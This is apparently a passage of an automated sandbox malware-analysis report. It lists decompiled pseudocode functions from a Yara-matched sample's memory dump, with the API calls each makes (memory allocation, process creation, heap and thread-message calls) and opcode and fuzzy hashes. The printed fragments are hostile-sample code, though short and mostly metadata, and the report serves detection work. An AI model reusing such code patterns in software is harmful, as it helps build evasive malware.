                                                                                                                    0x004183c7
                                                                                                                    0x004183e9
                                                                                                                    0x004183ed

                                                                                                                    APIs
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2167126740-0
                                                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                    • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                    • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00418300(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E00418DD0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                                    0x00418303
                                                                                                                    0x00418306
                                                                                                                    0x0041830f
                                                                                                                    0x00418317
                                                                                                                    0x00418325
                                                                                                                    0x00418329

                                                                                                                    APIs
                                                                                                                    • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Close
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3535843008-0
                                                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                    • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                    • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: e451cc9eebb955b4fedb46407bea9ad068d38aad6bf224e32d83016342a406d0
                                                                                                                    • Instruction ID: 083493f1fc787a984f6fb0e72b5e296384773dd8cb60c366465a78c7396f7bba
                                                                                                                    • Opcode Fuzzy Hash: e451cc9eebb955b4fedb46407bea9ad068d38aad6bf224e32d83016342a406d0
                                                                                                                    • Instruction Fuzzy Hash: DA90026160104502D201716A4404626000A97D03C1FA1C032A5014555ECA658992F171
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 3991bc9189e1c52bfdce17286c4245004a23e7908dbaefe05f76792b7c5c637c
                                                                                                                    • Instruction ID: b417ac06e3daa00e766030c072bf4db0582811d6f8f0fceff70dcfffb6f72931
                                                                                                                    • Opcode Fuzzy Hash: 3991bc9189e1c52bfdce17286c4245004a23e7908dbaefe05f76792b7c5c637c
                                                                                                                    • Instruction Fuzzy Hash: C490027120104413D211616A4504717000997D03C1FA1C422A4414558D96968952F161
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 2a44a689a9f21f91308f3045f6eeeb62794905e69a9640f030993e469c6c542c
                                                                                                                    • Instruction ID: c422b1621c8530879f5a0adc1b40166e643833fa7dfe12c7cd2b0bd28f6a3f23
                                                                                                                    • Opcode Fuzzy Hash: 2a44a689a9f21f91308f3045f6eeeb62794905e69a9640f030993e469c6c542c
                                                                                                                    • Instruction Fuzzy Hash: 3B900261242081525645B16A44045174006A7E03C17A1C022A5404950C85669856E661
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 22a671f7f9e625e709b37c2649b4d0dff5d2963b4f39af695bde527ab6a00045
                                                                                                                    • Instruction ID: b9952e3a66ae352b219d4b789e893a428db8d1ac0ff1e0d9f2ab8eb7e5de6315
                                                                                                                    • Opcode Fuzzy Hash: 22a671f7f9e625e709b37c2649b4d0dff5d2963b4f39af695bde527ab6a00045
                                                                                                                    • Instruction Fuzzy Hash: A09002A134104442D200616A4414B160005D7E1381F61C025E5054554D8659CC52B166
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 6742ccbf2e76a34a2f54026eb4da335cac33bf790fc94e7e4e8801907ee2740a
                                                                                                                    • Instruction ID: 8580965b5f34048d2b35b5f145ebb545c161dee1e22da1714d14980fc253a71e
                                                                                                                    • Opcode Fuzzy Hash: 6742ccbf2e76a34a2f54026eb4da335cac33bf790fc94e7e4e8801907ee2740a
                                                                                                                    • Instruction Fuzzy Hash: EA9002A1202040034205716A4414626400A97E0381B61C031E5004590DC5658891B165
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 8ddff5a78a2cc22b81013c7da17ee9f35c72ab0fd69e427acd8b18ce050e07ec
                                                                                                                    • Instruction ID: f88f69e577dd8b5989aafa317b9eb9729724babef939b0e5cda768573c1f12d3
                                                                                                                    • Opcode Fuzzy Hash: 8ddff5a78a2cc22b81013c7da17ee9f35c72ab0fd69e427acd8b18ce050e07ec
                                                                                                                    • Instruction Fuzzy Hash: 239002B120104402D240716A4404756000597D0381F61C021A9054554E86998DD5B6A5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 15933bd02b5489df123c0109e45e42eaa67ccb17804bdb0326fddeab5ab6453c
                                                                                                                    • Instruction ID: c483a732e72e643345e5c2517cbe4069e032a07bba4822f984174797a1fa0d20
                                                                                                                    • Opcode Fuzzy Hash: 15933bd02b5489df123c0109e45e42eaa67ccb17804bdb0326fddeab5ab6453c
                                                                                                                    • Instruction Fuzzy Hash: C1900265211040030205A56A0704517004697D53D1361C031F5005550CD6618861A161
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 446a56bdfeab484916a566414efa7e0253d918ee0bdf761cc14319441670cd9c
                                                                                                                    • Instruction ID: 1fbca259a61b5c628cedd718d673250273c40fb7da732671623d085777a1c094
                                                                                                                    • Opcode Fuzzy Hash: 446a56bdfeab484916a566414efa7e0253d918ee0bdf761cc14319441670cd9c
                                                                                                                    • Instruction Fuzzy Hash: 6D9002712010C802D210616A840475A000597D0381F65C421A8414658D86D58891B161
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: a154e72207113ab9ff373fd21158da70194a75a1174dc6453b960dc6d5a700c5
                                                                                                                    • Instruction ID: 5ed9b0b157f08aa9d90cadecf97e7f5070e1b2857e94ab7fb2d4a65c765db022
                                                                                                                    • Opcode Fuzzy Hash: a154e72207113ab9ff373fd21158da70194a75a1174dc6453b960dc6d5a700c5
                                                                                                                    • Instruction Fuzzy Hash: E1900261601040424240717A88449164005BBE1391761C131A4988550D85998865A6A5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 42cef5452f3c50f75ed5eafd572469a056d21a4d02d03acebe0b2b41d8e4adc3
                                                                                                                    • Instruction ID: 12beb31a42e6f16600da33842f55526e3f0dbef1d29e9779d805a7a1b107bf25
                                                                                                                    • Opcode Fuzzy Hash: 42cef5452f3c50f75ed5eafd572469a056d21a4d02d03acebe0b2b41d8e4adc3
                                                                                                                    • Instruction Fuzzy Hash: 1690027120144402D200616A481471B000597D0382F61C021A5154555D86658851B5B1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: f277dd05afac6284ea5bfaa1fa7d8c897c2826d8e7d947ab3b779b1f6575ece8
                                                                                                                    • Instruction ID: b9aa8de0274dfe570327d28b3635bee3ecea3486e57ab3d96cfc54f313cb2c58
                                                                                                                    • Opcode Fuzzy Hash: f277dd05afac6284ea5bfaa1fa7d8c897c2826d8e7d947ab3b779b1f6575ece8
                                                                                                                    • Instruction Fuzzy Hash: B590027120104802D280716A440465A000597D1381FA1C025A4015654DCA558A59B7E1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 8d3ad400a02256c1823a8b4495c84d8814b12f56f0d4bee2931ea24e0b30f2da
                                                                                                                    • Instruction ID: a799925c9a3b6b55b7310f0094a5e37ebe6b7cdb67038a9596307b0c01161d4f
                                                                                                                    • Opcode Fuzzy Hash: 8d3ad400a02256c1823a8b4495c84d8814b12f56f0d4bee2931ea24e0b30f2da
                                                                                                                    • Instruction Fuzzy Hash: 2C90026121184042D300657A4C14B17000597D0383F61C125A4144554CC9558861A561
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: b2e7d8abbf11f692f9c865922de9fa56f71954cc5ad7e17c9b0f13fc0eaeae76
                                                                                                                    • Instruction ID: 0c2f40872d2acae7576e72831e90a96df8c033f0d42a532645e344cf749962f6
                                                                                                                    • Opcode Fuzzy Hash: b2e7d8abbf11f692f9c865922de9fa56f71954cc5ad7e17c9b0f13fc0eaeae76
                                                                                                                    • Instruction Fuzzy Hash: FA90026130104003D240716A54186164005E7E1381F61D021E4404554CD9558856A262
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 8f61cd37b52a2089f02786ea39214b54326ee7e66b46b0130b62f7ee400c5294
                                                                                                                    • Instruction ID: d650d38159504c192e7a91b5f25d0f0636b51fe036a91ca88c680fd496a52b3b
                                                                                                                    • Opcode Fuzzy Hash: 8f61cd37b52a2089f02786ea39214b54326ee7e66b46b0130b62f7ee400c5294
                                                                                                                    • Instruction Fuzzy Hash: 7790026921304002D280716A540861A000597D1382FA1D425A4005558CC9558869A361
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 468725d198022507069637aca72dee718064b9c872ea5e1e3f1d6884f8b0cd31
                                                                                                                    • Instruction ID: 57d1b6642db8151fd4bdbab017cd2598b81618eaf71c4946527e2ef1484c5cd3
                                                                                                                    • Opcode Fuzzy Hash: 468725d198022507069637aca72dee718064b9c872ea5e1e3f1d6884f8b0cd31
                                                                                                                    • Instruction Fuzzy Hash: 3790027131118402D210616A8404716000597D1381F61C421A4814558D86D58891B162
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: db45eb921bfbdd039cee7a420ed994b46241c23369db4b3a407ff44e051c7392
                                                                                                                    • Instruction ID: 3b26204582d5dd7030c9a573a1a5a39c6d6d610411b6e0fe2269be2f3466ebf6
                                                                                                                    • Opcode Fuzzy Hash: db45eb921bfbdd039cee7a420ed994b46241c23369db4b3a407ff44e051c7392
                                                                                                                    • Instruction Fuzzy Hash: 4290027120104402D20065AA5408656000597E0381F61D021A9014555EC6A58891B171
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                    • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                                                                                                                    • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                    • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00418550, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 37%
                                                                                                                    			E00418550(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, char _a48, intOrPtr _a52) {
				void* _t22;
				void* _t33;
				intOrPtr* _t34;

				_t16 = _a4;
				_t2 = _t16 + 0xa14; // 0x58de852
				_t3 = _t16 + 0xc80; // 0x408909
				_t34 = _t3;
				L00418DD0(_t33, _a4, _t34,  *_t2, 0, 0x37);
				_t5 =  &_a48; // 0x407c45
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44,  *_t5, _a52); // executed
				return _t22;
			}






                                                                                                                    0x00418553
                                                                                                                    0x00418556
                                                                                                                    0x00418562
                                                                                                                    0x00418562
                                                                                                                    0x0041856a
                                                                                                                    0x00418572
                                                                                                                    0x004185a4
                                                                                                                    0x004185a8

                                                                                                                    APIs
                                                                                                                    • CreateProcessInternalW.KERNELBASE(00407C1D,00407C45,004079DD,00000010,?,00000044,?,?,?,00000044,E|@D,00000010,004079DD,00407C45,00407C1D,00407C89), ref: 004185A4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                    • String ID: E|@D
                                                                                                                    • API String ID: 2186235152-1370303659
                                                                                                                    • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                                                                    • Instruction ID: 94e036b50fa194e4b03716d33ce7f49ba96107573156df30ea47add9cf45f2e3
                                                                                                                    • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                                                                    • Instruction Fuzzy Hash: 1E015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251D630E851CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				L00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                    0x004184b7
                                                                                                                    0x004184c2
                                                                                                                    0x004184cd
                                                                                                                    0x004184d1

                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID: &5A
                                                                                                                    • API String ID: 1279760036-1617645808
                                                                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                    • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                                                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                    • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				L00419D30( &_v67, 0, 0x3f);
				E0041A910( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 != 0) {
						L4:
						return _t14;
					}
					_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					goto L4;
				}
				return _t13;
			}












                                                                                                                    0x00407270
                                                                                                                    0x0040727f
                                                                                                                    0x00407283
                                                                                                                    0x0040728e
                                                                                                                    0x0040729e
                                                                                                                    0x004072ae
                                                                                                                    0x004072b3
                                                                                                                    0x004072ba
                                                                                                                    0x004072bd
                                                                                                                    0x004072ca
                                                                                                                    0x004072cc
                                                                                                                    0x004072ce
                                                                                                                    0x004072ed
                                                                                                                    0x00000000
                                                                                                                    0x004072ed
                                                                                                                    0x004072eb
                                                                                                                    0x00000000
                                                                                                                    0x004072eb
                                                                                                                    0x004072f2

                                                                                                                    APIs
                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1836367815-0
                                                                                                                    • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                                    • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                                                                                                    • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                                    • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004184D2, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 65%
                                                                                                                    			E004184D2(signed int* __ecx, signed int __edx, signed int __edi, intOrPtr __fp0, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t14;
				void* _t29;

				asm("out dx, al");
				asm("lahf");
				gs =  *((intOrPtr*)(_t29 + 0x3d + __edi * 4));
				 *((intOrPtr*)(__ecx - 0x30)) = __fp0;
				 *__ecx =  *__ecx & __edx;
				_push(0x8bec8b55);
				_t11 = _v0;
				_t7 = _t11 + 0xc74; // 0xc74
				E00418DD0(__edi, _v0, _t7,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t14;
			}






                                                                                                                    0x004184d2
                                                                                                                    0x004184d3
                                                                                                                    0x004184d4
                                                                                                                    0x004184d8
                                                                                                                    0x004184dd
                                                                                                                    0x004184df
                                                                                                                    0x004184e3
                                                                                                                    0x004184ef
                                                                                                                    0x004184f7
                                                                                                                    0x0041850d
                                                                                                                    0x00418511

                                                                                                                    APIs
                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3298025750-0
                                                                                                                    • Opcode ID: 1e385673162a2dec4d0b89e02d5cdb996c04fa7434ec81a1559e1a0755a5c315
                                                                                                                    • Instruction ID: 6779f3412cf1ea62c4e4a45f5f4d75c74c39be4ea27dbf5a0490146149385879
                                                                                                                    • Opcode Fuzzy Hash: 1e385673162a2dec4d0b89e02d5cdb996c04fa7434ec81a1559e1a0755a5c315
                                                                                                                    • Instruction Fuzzy Hash: A5E022B82142459FD714EF29E8808AB7390FFD1348B144A8EE88847306C231C429CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				L00418DD0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
